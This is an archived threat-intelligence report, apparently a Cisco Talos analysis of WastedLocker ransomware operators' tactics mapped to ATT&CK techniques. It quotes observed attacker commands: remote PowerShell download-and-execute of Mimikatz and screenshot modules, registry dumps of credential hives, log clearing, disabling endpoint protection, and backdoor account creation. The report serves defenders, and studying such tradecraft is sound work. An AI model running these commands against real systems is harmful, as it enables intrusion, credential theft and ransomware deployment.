{
	"id": "7fb2ea7d-6619-4a71-872f-332e8797caa3",
	"created_at": "2026-04-06T00:20:00.566272Z",
	"updated_at": "2026-04-10T03:19:57.423076Z",
	"deleted_at": null,
	"sha1_hash": "9572fd8cd35ae8e56cc19e9f9576defdba0265c4",
	"title": "WastedLocker Goes \"Big-Game Hunting\" in 2020",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 151887,
	"plain_text": "WastedLocker Goes \"Big-Game Hunting\" in 2020\r\nBy Edmund Brumaghin\r\nPublished: 2020-07-06 · Archived: 2026-04-05 16:17:07 UTC\r\nBy Ben Baker, Edmund Brumaghin, JJ Cummings and Arnaud Zobec.\r\nThreat summary\r\nAfter initially compromising corporate networks, the attacker behind WastedLocker performs privilege\r\nescalation and lateral movement prior to activating ransomware and demanding ransom payment.\r\nThe use of \"dual-use\" tools and \"LoLBins\" enables adversaries to evade detection and stay under the radar\r\nas they further operate towards their objectives in corporate environments.\r\nWastedLocker is one of the latest examples of adversaries' continued use of lateral movement and privilege\r\nescalation to maximize the damage caused by ransomware.\r\nThe use of \"big-game hunting\" continues to cause significant operational and financial damages to\r\norganizations around the globe.\r\nBackground\r\nRansomware is a serious threat to organizations around the world. It is used to\r\ndisrupt operations on computing systems so that attackers can extort victims and\r\ndemand payment, typically in the form of cryptocurrency, to restore normal\r\noperations on infected systems. As the threat actors behind ransomware attacks\r\nhave matured in their capabilities, they have refined their approach to generating\r\nrevenue using this business model. One recent evolution has been the use of\r\nprivilege escalation and lateral movement techniques prior to the activation of\r\nransomware payloads within organizational environments.\r\nBy delivering and activating ransomware on many different systems within corporate networks simultaneously,\r\nattackers can maximize the damage they inflict. This often results in a situation where organizations may be more\r\nlikely to pay a ransom demand than they otherwise would have been, had only a single endpoint been affected. 
In\r\nsome cases organizational backup and recovery strategies may not have been adequately tested against situations\r\nin which a significant portion of their production environment is adversely affected at the same time, which may\r\ncause them to be more willing to pay a ransom demand. It also allows adversaries to increase the amount of the\r\nransom they are demanding, often resulting in ransom demands for hundreds of thousands of dollars or more to\r\nrecover infected systems. This approach is sometimes referred to as \"big-game hunting.\"\r\nAdversaries have used this approach more frequently over the past year. One of the most recent examples of this is\r\nwith the emergence of a threat actor that is currently leveraging a ransomware family known as \"WastedLocker.\"\r\nhttps://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html\r\nPage 1 of 9\n\nThe adversary behind these attacks is taking advantage of various \"dual-use\" toolsets like Cobalt Strike,\r\nMimikatz, Empire, and PowerSploit to facilitate lateral movement across environments being targeted. These\r\ntoolsets are typically developed to aid with penetration testing or red-teaming activities, but their use is often co-opted by malicious adversaries as well. Additionally, the use of native operating system functionality, and what are\r\ncommonly referred to as \"LoLBins\" allows attackers to evade detection and operate under the radar until they are\r\nready to activate the ransomware and make their presence known.\r\nTechnical details\r\nMultiple reports have been published recently detailing activity associated with\r\nWastedLocker attacks. 
The focus of this post will be on dissecting the various\r\nphases of these attacks and describing the tactics, techniques, and procedures that\r\nCisco Talos has observed the threat actor behind WastedLocker using within\r\ntarget environments for the purposes of maximizing their sphere of influence\r\nwithin the network and facilitating the activation of ransomware across the\r\nenvironment.\r\nInitial access and compromise ATT\u0026CK Technique: Drive-By Compromise (T1189)\r\nAs described in previous reporting, the initial compromise appears to be related to fake Google Chrome updates\r\nthat are delivered to victims via drive-by download attacks when victims browse compromised websites. The\r\ninitial malware is delivered to victims in the form of a ZIP archive that contains a malicious JavaScript file. The\r\nmalicious JavaScript is then executed using wscript.exe to initiate the infection process.\r\nC:\\Windows\\System32\\WScript.exe C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Temp\\Temp1_Chrome.Update.b343b0.zip\\Chrome.Up\r\nThe threat actor also makes use of Cobalt Strike payloads to perform command execution, process injection,\r\nprivilege escalation, and process impersonation on infected systems. 
It is also used to dump credentials on the\r\nsystem, which may be used to authenticate to other systems on the compromised network to facilitate further\r\nlateral movement activities.\r\nExecution ATT\u0026CK Technique: PowerShell (T1086)\r\nATT\u0026CK Technique: Service Execution (T1035)\r\nPowerShell Execution Policy\r\nThe PowerShell execution policy was set to \"RemoteSigned\", which allows locally created PowerShell\r\nscripts to be executed without requiring them to be signed.\r\npowershell /c Set-ExecutionPolicy RemoteSigned\r\nRemote Command Execution\r\nThe PsExec utility was used to establish command execution on remote systems within the environment.\r\npsexec -s \\\\\u003cHOSTNAME\u003e|\u003cIP_ADDRESS\u003e cmd\r\nLateral movement ATT\u0026CK Technique: Windows Management Instrumentation (T1047)\r\nATT\u0026CK Technique: Windows Admin Shares (T1077)\r\nLateral movement is performed by leveraging the Windows Management Instrumentation (WMI) command line\r\nutility (wmic.exe) to facilitate command execution on remote systems. This functionality is used to download\r\nremotely hosted PowerShell scripts that can be passed to the Invoke-Expression (IEX) cmdlet and executed across\r\nthe network. An example of this activity is below:\r\nC:\\Windows\\System32\\Wbem\\WMIC.exe /node:\u003cIP_ADDRESS\u003e process call create cmd /c powershell -nop -exec bypass -c\r\nThe attacker leverages administrative shares within Windows, specifically the ADMIN$ share, to move data\r\nbetween systems across the compromised network.\r\nCredential dumping ATT\u0026CK Technique: Credential Dumping (T1003)\r\nATT\u0026CK Technique: Credentials In Registry (T1214)\r\nIn most domain environments, Windows credentials can be used to authenticate to various systems across the\r\nnetwork. 
Malicious attackers often dump cached credentials on systems they successfully compromise so that they\r\ncan be used to remotely authenticate to other systems within the same security boundary or domain. The attacker\r\nbehind WastedLocker has been observed using multiple techniques for retrieving cached credentials on systems\r\nunder their control.\r\nCisco Talos has observed this adversary leveraging Cobalt Strike to dump credentials using Procdump, which is\r\npart of the SysInternals Suite from Microsoft.\r\nAdditionally, registry-based credential retrieval is performed by extracting the contents of the following registry\r\nlocations using the \"reg save\" command.\r\nreg save HKLM\\SAM C:\\programdata\\SamBkup.hiv\r\nreg save HKLM\\SYSTEM C:\\programdata\\FileName.hiv\r\nThe adversary was also observed leveraging Mass-Mimikatz, a component of Empire that allows attackers to\r\nexecute Mimikatz on multiple systems over the network. This is performed by using WMI to spawn a new\r\nPowerShell process. This PowerShell process is used to retrieve the MassMimikatz module from GitHub\r\nand pass it to IEX for execution along with parameters. The parameters are then used to facilitate the retrieval of\r\ncredentials from remote systems.\r\nC:\\WINDOWS\\SYSTEM32\\WBEM\\WMIC.exe /node:localhost process call create powershell /c IEX (New-Object\r\nNet.WebClient).DownloadString('https://raw.githubusercontent[.]com/PowerShellEmpire/PowerTools/master/PewPewPew/\r\nCOMPUTERNAME2'|Invoke-MassMimikatz -Verbose \u003e c:/programdata/2.txt\r\nPrior reporting has indicated that this adversary is no longer leveraging Empire; however, Cisco Talos has observed\r\ncontinued use of components of this toolset in active attacks. While the original Empire project is no longer under\r\nactive development, it has since been forked and development on the new project continues. 
In this case, however,\r\nthe attacker continues to leverage modules retrieved from the original project repositories.\r\nAs previously described, the attacker has the capability of leveraging multiple techniques for retrieving credentials\r\nthat may be reused on the network. In many cases this is the most effective and efficient way to move laterally and\r\ncan often result in escalation of privileges within a domain environment if attackers can obtain privileged\r\ncredentials like service accounts or those used for administrative purposes.\r\nDiscovery ATT\u0026CK Technique: Account Discovery (T1087)\r\nATT\u0026CK Technique: Process Discovery (T1057)\r\nATT\u0026CK Technique: Remote System Discovery (T1018)\r\nATT\u0026CK Technique: System Information Discovery (T1082)\r\nAfter successfully compromising the environment, the adversary performed various activities on systems under\r\ntheir control to obtain further information about the system as well as the environment in which the system is\r\nlocated. This post-compromise discovery process allows attackers to identify how the environment is configured\r\nas well as additional targets for lateral movement as they continue to operate towards their longer-term objectives.\r\nIt is important to note that the discovery and enumeration activities observed in this section were all performed via\r\nmanual operator activities conducted on systems, not via scripting or other automated methods. In several cases,\r\nthe attacker attempted to execute command line syntax containing typographical errors, followed immediately by\r\ncorrections to the syntax and subsequent command execution. 
Some examples of various discovery and\r\nenumeration activities are outlined below.\r\nAccount and Privilege Enumeration\r\nC:\\Windows\\System32\\cmd.exe /C whoami /all \u003e\u003e C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Temp\\rad971D8.tmp\r\nC:\\WINDOWS\\system32\\net.exe user \u003cUSERNAME\u003e /domain\r\nC:\\WINDOWS\\system32\\net1 user \u003cUSERNAME\u003e /domain\r\nC:\\WINDOWS\\system32\\cmd.exe /C quser\r\nC:\\WINDOWS\\system32\\quser.exe /server:\u003cIP_ADDRESS\u003e\r\nC:\\Windows\\system32\\cmd.exe /C qwinsta\r\nC:\\WINDOWS\\system32\\qwinsta.exe /server:\u003cIP_ADDRESS\u003e\r\nGroup Membership Enumeration\r\nC:\\Windows\\System32\\cmd.exe /C net group domain admins /domain \u003e\u003e C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Temp\\rad65F\r\nSystem/Domain Trust Enumeration\r\nC:\\Windows\\system32\\cmd.exe /C nltest /dclist:\u003cDOMAIN|IP_ADDRESS\u003e\r\nLocal System Enumeration\r\nC:\\Windows\\system32\\cmd.exe /C systeminfo | findstr /B /C:OS Name /C:OS Version\r\npowershell.exe (Get-WmiObject -Query 'SELECT Caption FROM Win32_OperatingSystem').Caption\r\nwmic path win32_operatingsystem get caption\r\nLocal Service Enumeration\r\nsc queryex type= service\r\nC:\\Windows\\System32\\cmd.exe /C net start \u003e\u003e C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Temp\\rad38FFC.tmp\r\nC:\\Windows\\system32\\net1 start\r\nC:\\Windows\\system32\\cmd.exe /C powershell Get-WmiObject win32_service -ComputerName localhost | Where-Object {$\r\npowershell Get-WmiObject win32_service -ComputerName localhost\r\nNetwork and Shared Folder Enumeration\r\nC:\\WINDOWS\\system32\\cmd.exe /C net use\r\nC:\\WINDOWS\\system32\\cmd.exe /C dir \\\\\u003cIP_ADDRESS\u003e\\c$\r\nC:\\Windows\\system32\\cmd.exe /C dir 
\\\\\u003cHOSTNAME\u003e\\c$\\programdata\r\nC:\\WINDOWS\\system32\\cmd.exe /C ping -n 1 \u003cHOSTNAME\u003e\r\nNetwork Connectivity/Egress Testing\r\nC:\\Windows\\system32\\cmd.exe /C ping -n 1 cofeedback[.]com\r\nDefense Evasion ATT\u0026CK Technique: Indicator Removal on Host (T1070)\r\nATT\u0026CK Technique: Disabling Security Tools (T1089)\r\nATT\u0026CK Technique: Compile After Delivery (T1500)\r\nATT\u0026CK Technique: Trusted Developer Utilities (T1127)\r\nThe attacker leverages the msbuild.exe LoLBin — previously described by Cisco Talos here — to evade endpoint\r\ndetection and execute the Cobalt Strike payloads. The following are examples of msbuild being used to execute\r\nthese payloads.\r\nC:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\msbuild.exe\",\"C:\\\\Programdata\\\\\\\\moveme.csproj\"\r\nC:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\msbuild.exe\",\"C:\\\\Programdata\\\\\\\\m0v3m3.csproj\r\nFollowing operator interaction with systems, the adversary used PsExec to invoke the \"wevtutil.exe\" utility. This\r\nutility cleared the contents of local security event logs on systems. Rather than selectively removing specific log\r\nentries and \"timestomping\" or manipulating the timestamps associated with the logs, the adversary simply cleared\r\nthe entire contents of the log files. In addition to clearing log entries, the adversary was also observed disabling\r\nendpoint security software deployed on systems under their control. 
Some examples of this are below:\r\nClearing Log Entries\r\nPsExec.exe -s \\\\localhost cmd /c for /F tokens=* %1 in ('wevtutil.exe el') DO wevtutil.exe cl %1\r\nStopping \u0026 Disabling Endpoint Protection\r\nSeveral attempts were made to disable security protections deployed on endpoint systems, including\r\nSymantec Endpoint Protection, Windows Defender, and Cisco AMP for Endpoints.\r\nAttempting to Disable Symantec Endpoint Protection\r\nC:\\WINDOWS\\system32\\cmd.exe /c C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\14.2.5323.2000.105\\\r\nC:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\14.2.5323.2000.105\\Bin\\Smc.exe -disable -sep\r\nAttempting to Disable Cisco AMP for Endpoints\r\nC:\\Windows\\system32\\taskkill.exe /F /IM sfc.exe\r\nC:\\Windows\\system32\\cmd.exe /C C:\\Program Files\\Cisco\\AMP\\7.2.7\\sfc.exe -stop\r\nAttempting to Disable Windows Defender Features\r\nC:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection\r\nThe adversary also frequently leveraged .NET runtime compilation when delivering payloads to additional\r\nsystems within the compromised environment.\r\n.NET Runtime Compilation\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 /OUT:C:\\Users\\\u003cUSERN\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /noconfig /fullpaths @C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\r\nPersistence ATT\u0026CK Technique: Account Manipulation (T1098)\r\nA common mechanism used by attackers to achieve a persistent ability to access systems within compromised\r\nenvironments is the creation of backdoor accounts that can be subsequently used by the attacker to access systems\r\nunder their control following initial compromise. 
We observed the adversary attempting to establish local\r\nadministrative accounts on systems that could be used for this purpose.\r\nC:\\WINDOWS\\system32\\cmd.exe /C net user Admim \u003cPASSWORD\u003e /ADD\r\nC:\\WINDOWS\\system32\\cmd.exe /C net localgroup Administrators Admim /ADD\r\nCollection Activity ATT\u0026CK Technique: Screen Capture (T1113)\r\nWMI is also used to execute a PowerShell process on remote systems across the network. The Invoke-Expression\r\n(IEX) cmdlet retrieves the PowerSploit module \"Get-TimedScreenshot\" from its GitHub repository and executes it\r\non the remote system to capture screenshots of that system every 30 seconds.\r\nC:\\Windows\\System32\\Wbem\\WMIC.exe /node:\u003cREMOTE_IP\u003e process call create powershell /c IEX (New-Object\r\nSystem.Net.Webclient).DownloadString('https://raw.githubusercontent[.]com/PowerShellMafia/PowerSploit/master/Exf\r\n-Path c:\\programdata\\ -Interval 30\r\nThe collected screenshots are saved under the %PROGRAMDATA% directory on the remote system for later\r\nretrieval.\r\nConclusion\r\nThese tactics, techniques and procedures used by the threat actor behind\r\nWastedLocker demonstrate how these sorts of attacks are taking place across\r\norganizational environments. Organizations should be aware of how attackers are\r\nmoving laterally, escalating privileges, and then using the elevated access to large\r\nportions of the environment to maximize the effectiveness of the ransomware\r\npayloads that they are deploying. It is not always enough to simply deploy\r\nperimeter security; organizations should also ensure that they have layered\r\nsecurity so that they can prevent, detect and respond to malicious activity that\r\nmay be conducted within the organization's network following attacks that are\r\nsuccessful at compromising perimeter security defenses. 
Additionally,\r\norganizations should ensure that their backup and recovery strategies are tested\r\nagainst a variety of different scenarios that may disrupt business operations to\r\nensure that they can recover even in situations where large percentages of systems\r\nor infrastructure are affected at the same time. Adversaries are constantly seeking\r\nto improve upon their strategies for achieving their mission objectives, and we will\r\nlikely continue to observe these refinements across the threat landscape.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these\r\nthreat actors. Exploit Prevention present within AMP is designed to protect customers from unknown attacks such\r\nas this automatically.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious\r\nwebsites and detects malware used in these attacks.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention\r\nSystem (NGIPS), Cisco ISR, and Meraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nSource: https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html"
	],
	"report_names": [
		"wastedlocker-emerges.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434800,
	"ts_updated_at": 1775791197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9572fd8cd35ae8e56cc19e9f9576defdba0265c4.pdf",
		"text": "https://archive.orkl.eu/9572fd8cd35ae8e56cc19e9f9576defdba0265c4.txt",
		"img": "https://archive.orkl.eu/9572fd8cd35ae8e56cc19e9f9576defdba0265c4.jpg"
	}
}